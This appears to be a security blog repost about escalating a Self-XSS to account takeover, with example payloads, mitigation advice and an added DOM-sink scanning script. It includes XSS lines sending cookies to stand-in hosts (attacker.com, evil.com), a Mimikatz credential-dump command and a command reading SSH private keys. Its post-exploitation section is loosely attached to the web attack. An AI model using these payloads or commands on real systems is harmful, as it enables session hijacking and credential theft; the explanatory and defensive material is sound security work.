From Self-XSS to Full Account Takeover: A Penetration Tester’s Journey


Amr Mustafa, a Penetration Tester at Bugswagger and Bug Hunter at HackerOne, recently shared his experience uncovering a critical vulnerability. Starting from a Self-XSS flaw, he escalated it to a full Account Takeover (ATO) after 30 hours of intensive work. A detailed write-up is expected soon.

You Should Know:

1. Understanding Self-XSS

Self-XSS (Cross-Site Scripting) is a client-side vulnerability in which the injected JavaScript runs only in the attacker's own session, for example because the input is rendered back only to the user who typed it, or because the "payload" is pasted into the browser console. Because the attacker has no direct way to deliver it to a victim, Self-XSS on its own is usually rated low or informational; attackers often rely on social engineering to trick users into running the payload themselves.

Example Payload:

alert(document.cookie); // Basic XSS test

2. Escalating to Stored XSS

If the application stores the input and later renders it unsafely in another user's session, a Self-XSS can sometimes be escalated to Stored XSS, turning a payload that only ever ran for the attacker into one that runs for every viewer:

<script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script>

3. Exploiting XSS for Account Takeover

Once XSS is confirmed, attackers can:

  • Steal session cookies.
  • Perform CSRF attacks.
  • Modify account settings (email/password).

Cookie Theft via XSS:

var img = new Image(); // image request carries the cookie string in the query string
img.src = 'http://evil.com/log?cookie=' + encodeURIComponent(document.cookie);
// This only works if the session cookie is readable from JavaScript; an HttpOnly cookie never appears in document.cookie.

4. Mitigation Techniques

  • Implement Content Security Policy (CSP) headers that actually forbid injected script. A policy allowing 'unsafe-inline' or 'unsafe-eval' on script-src gives no XSS protection; use a per-response nonce (or hashes) instead:
    Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-<random-per-response>'; object-src 'none'; base-uri 'self'
    
  • Use HttpOnly and Secure flags for cookies.
  • Sanitize user input with libraries like DOMPurify.

5. Post-Exploitation: Lateral Movement

If an ATO is successful, attackers may:

  • Use Mimikatz (Windows) to extract credentials:
    Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
    
  • Check for SSH keys (Linux):
    cat ~/.ssh/id_rsa
    

What Undercode Says:

Escalating from Self-XSS to ATO requires persistence and creativity. Always test for:
– DOM-based vulnerabilities (eval(), innerHTML).
– Insecure API endpoints that accept malicious input.
– Weak session management (e.g., non-rotating tokens).

Key Commands for Bug Hunters:

  • Linux:
    grep -rn --include='*.js' "document.cookie" /var/www/html   # find JS cookie handling
    
  • Windows:
    Get-ChildItem -Path C:\inetpub\wwwroot -Recurse -Include *.js | Select-String "innerHTML"
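A small static check covering both the "always test for" list (eval(), innerHTML and the other DOM sinks) and the grep/Select-String commands above, generalised into one script that reports the line, the sink hit and whether a known DOM source appears on the same line. This is an added example written for this page, not a tool from the original post; the sample front-end code it scans is constructed here, and the check is a triage aid, not a taint analysis.

```javascript
// Added example (not from the original post): grep-style DOM sink triage over JS source.
// The SAMPLE below is constructed for the demonstration.

// Sinks worth reviewing, the pattern that matches a use, and why a hit matters.
const SINKS = [
  { name: 'innerHTML/outerHTML assignment', re: /\.(inner|outer)HTML\s*=/, note: 'untrusted input here renders as markup' },
  { name: 'insertAdjacentHTML', re: /\.insertAdjacentHTML\s*\(/, note: 'same risk as innerHTML' },
  { name: 'eval()', re: /\beval\s*\(/, note: 'string executed as code' },
  { name: 'Function constructor', re: /\bnew\s+Function\s*\(/, note: 'string executed as code' },
  { name: 'string timer', re: /\bset(Timeout|Interval)\s*\(\s*["'`]/, note: 'string executed as code' },
  { name: 'document.write', re: /\bdocument\.write(ln)?\s*\(/, note: 'untrusted input here renders as markup' },
  { name: 'document.cookie read', re: /\bdocument\.cookie\b/, note: 'script-readable cookie; check HttpOnly on session cookies' },
  { name: 'location sink', re: /\b(location|window\.location)(\.href)?\s*=|location\.(assign|replace)\s*\(/, note: 'javascript: URLs reach this sink' },
];

// Attacker-controlled DOM sources; a sink on the same line as one of these is high priority.
const SOURCES = /location\.(hash|search|href)|document\.(URL|referrer)|window\.name|postMessage|URLSearchParams/;

// Scan one file's source text; returns one finding per (line, sink) hit.
function scanSource(code, filename = 'input.js') {
  const findings = [];
  code.split('\n').forEach((line, i) => {
    for (const s of SINKS) {
      if (s.re.test(line)) {
        findings.push({
          file: filename,
          line: i + 1,
          sink: s.name,
          source_on_line: SOURCES.test(line),
          note: s.note,
          text: line.trim(),
        });
      }
    }
  });
  return findings;
}

function summarize(findings) {
  return { total: findings.length, high_priority: findings.filter(f => f.source_on_line).length };
}

// Constructed sample resembling a page's front-end code (not from any real application).
const SAMPLE = [
  "const name = new URLSearchParams(location.search).get('name');",
  "document.getElementById('greet').innerHTML = 'Hello ' + name;",   // sink, source on an earlier line
  "document.getElementById('greet').textContent = name;",            // safe sink, no finding
  'setTimeout("refresh()", 1000);',                                   // string timer
  "document.getElementById('hash').innerHTML = location.hash.slice(1);", // sink + source: high priority
  "const token = document.cookie.split('; ').find(c => c.startsWith('session='));",
  "if (location.hash) location.href = decodeURIComponent(location.hash.slice(1));", // sink + source
].join('\n');

const results = scanSource(SAMPLE, 'app.js');
for (const f of results) {
  console.log(`${f.file}:${f.line} [${f.source_on_line ? 'HIGH' : 'review'}] ${f.sink}: ${f.text}  // ${f.note}`);
}
console.log(summarize(results));
```

Hits flagged "review" rather than "HIGH" (line 2 in the sample, where the tainted value was assigned a line earlier) are exactly the ones a line-based grep cannot resolve, so they still need a manual data-flow check; the script only ranks where to start.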
    

Expected Output:

A full technical write-up from Amr Mustafa, detailing:

1. Initial Self-XSS discovery.

2. Exploitation path to ATO.

3. Vendor response and patch timeline.

4. Lessons learned for defensive hardening.

(Stay tuned for the full report!)

References:

Reported By: Amr Mustafa11 – Hackers Feeds